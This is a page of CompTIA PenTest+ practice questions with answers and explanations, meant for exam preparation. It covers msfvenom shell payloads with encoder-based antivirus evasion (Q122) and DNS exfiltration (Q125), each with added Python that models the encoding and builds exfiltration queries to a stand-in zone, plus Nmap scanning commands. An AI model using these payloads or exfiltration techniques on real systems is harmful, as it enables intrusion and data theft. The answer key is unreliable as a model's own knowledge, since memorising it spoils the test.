ExamGecko

CompTIA PT0-003 Practice Test - Questions Answers, Page 13



Question 121


Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?

A. The tester is conducting a web application test.

B. The tester is assessing a mobile application.

C. The tester is evaluating a thick client application.

D. The tester is creating a threat model.

Suggested answer: D
Explanation:

DREAD for Threat Modeling:

DREAD is a risk-rating model used inside threat modeling. Each identified threat is scored on Damage potential, Reproducibility, Exploitability, Affected users and Discoverability (the letters of the acronym), and the scores are combined to rank which threats to address first. It is a prioritisation scheme for a threat model, not a methodology for running an engagement.

PTES (the Penetration Testing Execution Standard) is the other kind of framework: it defines the phases of an engagement (pre-engagement, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, reporting). A tester planning a test follows PTES; a tester who is specifically building a threat model reaches for DREAD, typically alongside STRIDE for enumerating the threats that DREAD then rates.

Why Not Other Options?

A, B, C: These name the type of target (web, mobile, thick client). The target type does not decide between the two frameworks: PTES applies to all three kinds of test, and DREAD can rate threats against any of them. Only D describes the activity DREAD was designed for.

CompTIA Pentest+

Reference:

Domain 1.0 (Planning and Scoping)

asked 20/01/2025 by Tom Rez

Question 122


A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?

A. msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443

B. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000

C. msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none

D. net user add /administrator | hexdump > payload

Suggested answer: A
Explanation:

Using shikata_ga_nai:

Option A is the only command that applies an encoder, which is what the question is asking for. An msfvenom encoder rewrites the payload bytes (shikata_ga_nai XORs the payload with a key that changes every dword and is chosen fresh on each run) and prepends a small decoder stub that restores the original at run time, so the static byte pattern of the raw payload that a signature-based antimalware engine keys on is no longer present in the generated file.

The payload is a bind shell: it listens on the target on LPORT=443, a port chosen to blend in with HTTPS, and the tester connects in to obtain the shell.

Caveats a practitioner should know:

As printed, option A would not run unmodified. msfvenom names the 64-bit architecture x64, not x86-64, and shikata_ga_nai exists only as x86/shikata_ga_nai, a 32-bit polymorphic XOR additive-feedback encoder; 64-bit payloads have to use an x64 encoder such as x64/xor_dynamic or x64/zutto_dekiru (msfvenom --list encoders shows what is available). The exam is testing the concept, not the exact flags.

Encoders were built to avoid bad characters in exploits, not to evade antimalware. The shikata_ga_nai decoder stub is itself heavily signatured and current AV/EDR products detect Metasploit payloads behaviourally, so in a real engagement encoding alone rarely gets a payload past modern protections. It is still the intended answer because it is the only option that does anything to the payload bytes at all.

Why Not Other Options?

B, C: These generate a Meterpreter stager and a plain reverse shell respectively with no encoder, so the well-known payload bytes are left intact for signature matching. EXITFUNC=none in C only controls how the shellcode exits the thread; it has no effect on detection.

D: This is unrelated to generating shellcode; it is a malformed net user invocation piped through hexdump, and would neither create an account nor produce a payload.

CompTIA Pentest+

Reference:

Domain 3.0 (Attacks and Exploits)

asked 20/01/2025 by Sweet Don
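As an added illustration that is not part of the question or of Metasploit's code, the following Python models the XOR additive-feedback step that shikata_ga_nai applies, on a constructed 16-byte stand-in (not real shellcode), so the effect on a static signature can be checked directly. The decoder stub that real msfvenom output prepends is omitted, and the key values are arbitrary.

```python
"""Model of the XOR additive-feedback step behind x86/shikata_ga_nai.

Added illustration, not Metasploit code.  It shows why an encoded payload
no longer contains the raw payload's byte signature and why two runs
differ.  Real msfvenom output prepends an x86 decoder stub (omitted here,
and itself a well-known signature); RAW_PAYLOAD is constructed filler,
not working shellcode, and the key values are arbitrary.
"""
import os
import struct

# Constructed stand-in for a raw payload (not real shellcode).
RAW_PAYLOAD = bytes.fromhex("fc4883e4f0e8c0000000415141505251")


def _pad(data: bytes) -> bytes:
    """Pad to a 4-byte boundary; the decoder works one little-endian dword at a time."""
    return data + b"\x00" * (-len(data) % 4)


def encode(payload: bytes, key: int) -> bytes:
    """XOR each dword with the running key, then add the plaintext dword into the key.

    key is a 32-bit unsigned integer.  Because the key changes every dword,
    a repeated plaintext pattern does not produce a repeated ciphertext pattern.
    """
    out = bytearray()
    for (plain,) in struct.iter_unpack("<I", _pad(payload)):
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)


def decode(encoded: bytes, key: int) -> bytes:
    """Inverse of encode(): what the prepended decoder stub does at run time."""
    out = bytearray()
    for (cipher,) in struct.iter_unpack("<I", encoded):
        plain = cipher ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)


def random_key() -> int:
    """msfvenom picks a fresh key per run; that is what makes the output polymorphic."""
    return struct.unpack("<I", os.urandom(4))[0]


def signature_survives(signature: bytes, blob: bytes) -> bool:
    """Would a static byte signature still match this blob?"""
    return signature in blob


if __name__ == "__main__":
    key = random_key()
    blob = encode(RAW_PAYLOAD, key)
    print("key       :", hex(key))
    print("raw       :", RAW_PAYLOAD.hex())
    print("encoded   :", blob.hex())
    print("sig match :", signature_survives(RAW_PAYLOAD[:4], blob))
    assert decode(blob, key)[: len(RAW_PAYLOAD)] == RAW_PAYLOAD
```

Run it twice and the encoded bytes differ while the decoded payload is identical; that is the whole effect an encoder has. What it cannot change is the decoder stub in front of the blob, which is why an engine that signatures the stub, or that simply lets the stub run and inspects the decoded memory, is not fooled.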

Question 123


A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:

PORT     STATE    SERVICE
22/tcp   open     ssh
25/tcp   filtered smtp
111/tcp  open     rpcbind
2049/tcp open     nfs

Based on the output, which of the following services provides the best target for launching an attack?

A. Database

B. Remote access

C. Email

D. File sharing

Suggested answer: D
Explanation:

From the Nmap results:

Service Analysis:

SSH (22): Secure Shell is a remote access protocol that is encrypted and authenticated. Without valid credentials or a known vulnerable server version the realistic options are password guessing, which is slow and noisy, so it is a poor first target.

SMTP (25): The port is filtered, meaning Nmap's probes were dropped (typically by a firewall) with no reply, so the service is not reachable from the tester's position and is not a usable attack vector from here.

rpcbind (111): The portmapper is rarely the target itself, but it is the service a tester queries to enumerate what NFS is exporting (rpcinfo -p, showmount -e). Its exposure makes the NFS path easier rather than standing alone as an option; none of the answer choices correspond to it.

NFS (2049): Network File System is a file-sharing service. Exports are commonly restricted only by client IP address (or not at all, with a wildcard export), so a host that can reach the port can often mount the share with no credentials and read whatever it contains.

Best Target:

NFS (port 2049) is the most attractive target. A tester would list the exports, mount any that are world-readable, and look for credentials, keys and configuration in the shared directories. If the export is configured with no_root_squash, a local root user on the tester's machine is treated as root on the share, which allows writing a SUID binary or modifying files owned by root and escalating privileges on the server.

CompTIA Pentest+

Reference:

Domain 2.0 (Information Gathering and Vulnerability Identification)

Domain 3.0 (Attacks and Exploits)

asked 20/01/2025 by ENET SOLUTIONS LOGICOM

Question 124


A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:

bash

for var in ---MISSING TEXT---
do
    ping -c 1 192.168.10.$var
done

Which of the following pieces of code should the penetration tester use in place of the ---MISSING TEXT--- placeholder?

A. crunch 1 254 loop

B. seq 1 254

C. echo 1-254

D. {1.-254}

Suggested answer: B
Explanation:

Correct Syntax for a Range Loop in Bash:

The seq command prints the integers from its first argument to its last, one per line. Inside $( ) that output becomes the word list the for loop iterates over, so the script pings 192.168.10.1 through 192.168.10.254, the usable host addresses of a /24 (Class C) network.

Example: seq 1 254 will output 1, 2, ..., 254 sequentially.

Explanation of Other Options:

A (crunch): crunch is a wordlist generator. Given min and max lengths and a character set, "crunch 1 254 loop" would try to emit every string of length 1 to 254 made from the letters l, o and p, not the numbers 1 to 254.

C (echo 1-254): This outputs the literal string 1-254, so the loop runs once and pings 192.168.10.1-254, which fails name resolution.

D ({1.-254}): This is not a valid brace expansion (the range operator is two dots, as in {1..254}), so Bash leaves it as the literal word and the loop runs once against 192.168.10.{1.-254}. The correctly spelled form, for var in {1..254}, is a built-in alternative to seq that needs no external command and is worth knowing for minimal shells where seq is absent.

Final Script:

bash

for var in $(seq 1 254)
do
    ping -c 1 192.168.10.$var
done

CompTIA Pentest+

Reference:

Domain 4.0 (Penetration Testing Tools)

Bash Scripting and Automation

asked 20/01/2025 by Larry Wong

Question 125


A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client's blue team. Which of the following exfiltration methods most likely remains undetected?

A. Cloud storage

B. Email

C. Domain Name System

D. Test storage sites

Suggested answer: C
Explanation:

The Domain Name System (DNS) is the usual answer for covert exfiltration because almost every host must be allowed to resolve names, so the channel exists even where direct outbound HTTP, email and cloud storage uploads are blocked, proxied or inspected by DLP. Here's how DNS exfiltration works:

Mechanism:

Data is encoded (hex or base32, since DNS names are case-insensitive) and split across the labels of a query name, each label at most 63 characters and the whole name at most 253, for example <chunk>.<chunk>.<attacker-domain>.

The victim host never talks to the attacker directly: it sends the query to the organisation's recursive resolver, which follows the delegation chain to the authoritative server for the attacker's zone. That server, controlled by the attacker, logs the queries and reassembles the data. Record types such as TXT or CNAME in the responses can carry data back, turning the channel into a full tunnel.

Why It Remains Undetected:

DNS is universally permitted and high volume, so a few thousand extra queries hide in the noise unless resolver logs are collected and analysed.

Many organisations inspect web and mail traffic closely but do not log or baseline DNS. Where they do (Zeek dns.log, resolver query logs), the tell-tales are unusually long names, high-entropy subdomains, many unique subdomains under a single rarely-seen parent domain, and elevated NXDOMAIN rates. A tester who wants to stay quiet throttles the query rate and keeps each label short, trading throughput for stealth.

Cloud storage and email pass through proxies and DLP inspection that are built to catch bulk data leaving, and "test storage sites" are not a recognised covert channel at all.

CompTIA Pentest+

Reference:

Domain 3.0 (Attacks and Exploits)

Domain 5.0 (Reporting and Communication)

asked 20/01/2025 by Ahmed Otmani Amaoui
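As an added example that is not part of the original question bank, the Python below builds the query names a compromised host would emit for a constructed secret, reassembles them the way the attacker's authoritative server would (in any arrival order), and runs a simple blue-team heuristic over a mixed query log to show both what gets caught and what a low-and-slow sender slips past. The zone exfil.example.com, the four-hex-digit sequence label and the detector thresholds are assumptions; nothing here sends traffic.

```python
"""DNS exfiltration: encode data into query names, reassemble it, and flag it.

Added example, not part of the question bank.  The zone exfil.example.com,
the 4-hex-digit sequence label and the detector thresholds are assumptions.
Nothing here sends traffic: it only builds and parses query names.
"""
import base64
import math
from collections import Counter

DOMAIN = "exfil.example.com"   # attacker-controlled zone (assumed)
MAX_LABEL = 63                 # RFC 1035 label limit
MAX_NAME = 253                 # practical FQDN limit
SEQ_LEN = 4                    # hex sequence label so out-of-order queries reassemble


def to_queries(data: bytes, domain: str = DOMAIN) -> list:
    """Split data into names of the form <seq>.<b32>.<b32>...<domain>.

    Base32 rather than base64: DNS names are case-insensitive and some
    resolvers fold case, which would corrupt a base64 alphabet.  The '='
    padding is not a legal label character, so it is stripped here and
    restored in from_queries().
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    # Each full label costs 63 chars plus its dot; budget what is left
    # after the sequence label, its dot, and the zone itself.
    labels_per_query = (MAX_NAME - len(domain) - SEQ_LEN - 1) // (MAX_LABEL + 1)
    chunk = labels_per_query * MAX_LABEL
    queries = []
    for seq, start in enumerate(range(0, len(b32), chunk)):
        piece = b32[start:start + chunk]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        queries.append(f"{seq:0{SEQ_LEN}x}." + ".".join(labels) + "." + domain)
    return queries


def from_queries(queries, domain: str = DOMAIN) -> bytes:
    """Reassemble the data from the queries seen at the authoritative server.

    Queries may arrive in any order (resolvers retry and parallelise), so the
    sequence label, not arrival order, decides placement.
    """
    suffix = "." + domain
    pieces = {}
    for name in queries:
        if not name.endswith(suffix):
            continue                      # unrelated traffic, not our zone
        seq, _, body = name[:-len(suffix)].partition(".")
        pieces[int(seq, 16)] = body.replace(".", "")
    b32 = "".join(pieces[k] for k in sorted(pieces)).upper()
    b32 += "=" * (-len(b32) % 8)          # restore the stripped padding
    return base64.b32decode(b32)


def _entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def flag_suspicious(query_log, max_len=80, min_entropy=3.5, max_unique=20) -> list:
    """Blue-team heuristic over queried names (thresholds are assumptions).

    Flags a name when it is unusually long, when its subdomain part has high
    entropy (encoded data), or when its parent zone has received more unique
    subdomains than a normal zone would.
    """
    def parent(name):                     # assume the parent zone is the last three labels
        return ".".join(name.split(".")[-3:])

    unique_per_parent = Counter(parent(n) for n in set(query_log))
    flagged = set()
    for name in query_log:
        sub = "".join(name.split(".")[:-3])
        too_long = len(name) > max_len
        noisy = bool(sub) and _entropy(sub) > min_entropy
        chatty = unique_per_parent[parent(name)] > max_unique
        if too_long or noisy or chatty:
            flagged.add(name)
    return sorted(flagged)


# Constructed sample secret and a constructed background of normal lookups.
SECRET = b"card=4111111111111111;exp=12/29;cvv=123\n" * 8
NORMAL = ["www.example.com", "mail.corp.example.com", "time.windows.com"]
```

Run on the 320-byte constructed secret, to_queries() produces three names of around 200 characters each, every one of which the heuristic flags on length alone. Send two bytes at a time instead and each name looks like 0000.nbuq.exfil.example.com, which passes every check: that trade-off between throughput and detectability is the real operational decision behind this question.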

Question 126


During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?

A. API

B. HTTP

C. IPA

D. ICMP

Suggested answer: A
Explanation:

API as a Target:

APIs (Application Programming Interfaces) are assets: a specific, scoped piece of the client's attack surface that can be listed in the rules of engagement and tested for broken authentication and authorisation, excessive data exposure, injection and rate-limiting flaws.

In modern applications the API often carries the business logic that the web and mobile front ends merely present, so it is frequently where the most serious findings come from.

Why Not Other Options?

B (HTTP): This is a protocol, not an asset. A target would be the web application or server that speaks HTTP.

C (IPA): A distractor here; as an acronym it is not a class of target asset (it is also the file extension of an iOS application archive, but the asset in that case would be the mobile application itself, which is not what the option says).

D (ICMP): This is a protocol used for network diagnostics, not an application asset.

CompTIA Pentest+

Reference:

Domain 1.0 (Planning and Scoping)

asked 20/01/2025 by Kevin Langthorne

Question 127


A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

A. Service discovery

B. OS fingerprinting

C. Host discovery

D. DNS enumeration

Suggested answer: C
Explanation:

In network penetration testing, the initial steps involve gathering information to build an understanding of the network's structure, devices, and potential entry points. The process generally follows a structured approach, starting from broad discovery methods to more specific identification techniques. Here's a comprehensive breakdown of the steps:

Host Discovery (Answer: C):

Objective: Identify which addresses on the segment have a live host before spending time on port or version scans against dead addresses.

Tools & Techniques:

Ping Sweep: nmap -sn runs host discovery only, with no port scan. What it actually sends depends on where the tester sits. Against a remote network a privileged Nmap uses ICMP echo, ICMP timestamp, TCP SYN to 443 and TCP ACK to 80; on the tester's own subnet, as in this scenario (hardwired to the network), it uses ARP requests instead, which a host firewall cannot block, so it also finds hosts that drop ICMP.

ARP Scan: arp-scan --localnet enumerates every device in the local broadcast domain by sending ARP requests and is the most reliable method on a local segment.

nmap -sn 192.168.1.0/24

Reference:

The GoBox and Forge HTB write-ups both start their enumeration phase with host discovery before moving on to service enumeration.

Service Discovery (Option A):

Objective: Once live hosts are known, determine which ports are open on them and which services and versions sit behind those ports.

Tools & Techniques:

Nmap: -sV probes the open ports found by the scan for version banners. It needs a target list, which is why it follows host discovery rather than preceding it.

nmap -sV 192.168.1.100

Reference:

In the Anubis and Bolt HTB write-ups, service discovery follows host identification and drives the choice of exploitation targets.

OS Fingerprinting (Option B):

Objective: Determine the operating system of the identified hosts.

Tools & Techniques:

Nmap: -O sends TCP/IP stack probes and matches the responses against Nmap's fingerprint database. Results are most reliable when the host has at least one open and one closed TCP port, so it is normally combined with, or run after, a port scan.

nmap -O 192.168.1.100

Reference:

Accurate OS fingerprinting helps tailor subsequent attacks and is performed after host and service discovery in the write-ups cited above.

DNS Enumeration (Option D):

Objective: Identify DNS records and gather subdomains related to the target domain.

Tools & Techniques:

dnsenum, dnsrecon, and dig.

dnsenum example.com

DNS enumeration widens the attack surface (subdomains, mail and name servers, zone transfers where the server allows them). On an internal test it is run against the organisation's own DNS servers, which the tester first has to find, so it follows host discovery and usually service identification.

Conclusion: The first step in a network penetration test from a hardwired position is to identify the live hosts on the segment (Host Discovery). That map of active devices is the input to every later enumeration task: service discovery, OS fingerprinting and DNS enumeration all need hosts to point at. Working from broad discovery to specific identification keeps the scan efficient and avoids wasting time and noise on addresses with nothing behind them.

asked 20/01/2025 by Nqobile Nxumalo

Question 128


Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?


Question 129


Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?


Question 130


A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command: nmap 10.10.1.0/24

Which of the following is the number of TCP ports that will be scanned?

Total 214 questions